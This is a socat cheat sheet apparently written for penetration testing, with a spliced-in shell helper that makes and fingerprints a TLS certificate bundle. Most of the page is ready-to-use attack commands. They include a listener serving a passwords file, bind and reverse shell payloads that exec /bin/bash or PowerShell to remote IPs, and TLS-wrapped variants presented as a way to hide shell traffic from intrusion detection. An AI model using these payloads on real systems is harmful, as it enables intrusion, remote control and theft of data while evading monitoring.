Socat

Socat establishes two bidirectional byte streams and transfers data between them

Note

Socat addresses use ip:port notation (a colon between host and port, not a space).

General usage

socat <SRC> <DST>

Example: connect stdin/stdout (the "-" address) to a web server

socat - TCP4:192.168.1.80:80

File transfer

sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt

Shell listener (-d -d prints notice-level diagnostics such as "listening on" and "accepting connection from")

socat -d -d TCP4-LISTEN:443 STDOUT

Shell payload

socat TCP4:10.11.0.22:443 EXEC:/bin/bash

TLS Shell

Socat can wrap the connection in TLS, which hides the shell traffic from network IDS signatures that inspect plaintext. Note that verify=0 on both ends disables certificate verification: the channel is encrypted but neither side authenticates the other, so a TLS-intercepting proxy on the path can sit in the middle unnoticed.

Generate cert

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt

Answer the certificate subject prompts with arbitrary values, then combine certificate and key into one PEM file (socat's cert= option expects both in the same file):

cat bind_shell.crt bind_shell.key > bind_shell.pem
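The same certificate step as a non-interactive script, added here as an example (it is not from the original page or from the socat project). It assumes the openssl CLI is installed; the -subj value is an arbitrary placeholder, and the make_cert_bundle, cert_fingerprint and pem_has_cert_and_key function names are this example's own. The fingerprint readout is the useful extra: whoever will connect to the OPENSSL-LISTEN side can compare it against what the listener presents (or load bind_shell.crt as a trust anchor) instead of running with verify=0, which accepts any certificate at all.

```shell
#!/bin/sh
# Added example, not part of the original page. Requires the openssl CLI.
set -eu

# make_cert_bundle DIR NAME: writes NAME.key, NAME.crt and NAME.pem into DIR.
# -subj replaces the interactive subject prompts; the CN is a placeholder.
make_cert_bundle() {
  dir=$1
  name=$2
  openssl req -newkey rsa:2048 -nodes -keyout "$dir/$name.key" \
    -x509 -days 362 -subj "/CN=example-placeholder" \
    -out "$dir/$name.crt" 2>/dev/null
  # socat's cert= option wants certificate and private key in one file
  cat "$dir/$name.crt" "$dir/$name.key" > "$dir/$name.pem"
  # the bundle contains the private key, so keep it owner-readable only
  chmod 600 "$dir/$name.key" "$dir/$name.pem"
}

# cert_fingerprint PEMFILE: prints the SHA-256 fingerprint of the certificate
# in the bundle (openssl reads the first certificate block and ignores the key).
cert_fingerprint() {
  openssl x509 -in "$1" -noout -fingerprint -sha256
}

# pem_has_cert_and_key PEMFILE: succeeds only when the bundle holds both the
# certificate and the private key that OPENSSL-LISTEN needs.
pem_has_cert_and_key() {
  grep -q 'BEGIN CERTIFICATE' "$1" && grep -q 'PRIVATE KEY' "$1"
}
```

Usage: `make_cert_bundle /tmp/certs bind_shell`, then `cert_fingerprint /tmp/certs/bind_shell.pem` and record the printed fingerprint out of band; `pem_has_cert_and_key` is a quick sanity check before pointing cert= at the file.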

Bind Shell

Payload

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

Connect with

socat - OPENSSL:10.1.2.3:443,verify=0

Reverse Shell

Listen with

sudo socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0 -

Payload

socat OPENSSL:192.168.119.154:443,verify=0 EXEC:'powershell.exe',pipes
Last update: 2021-09-01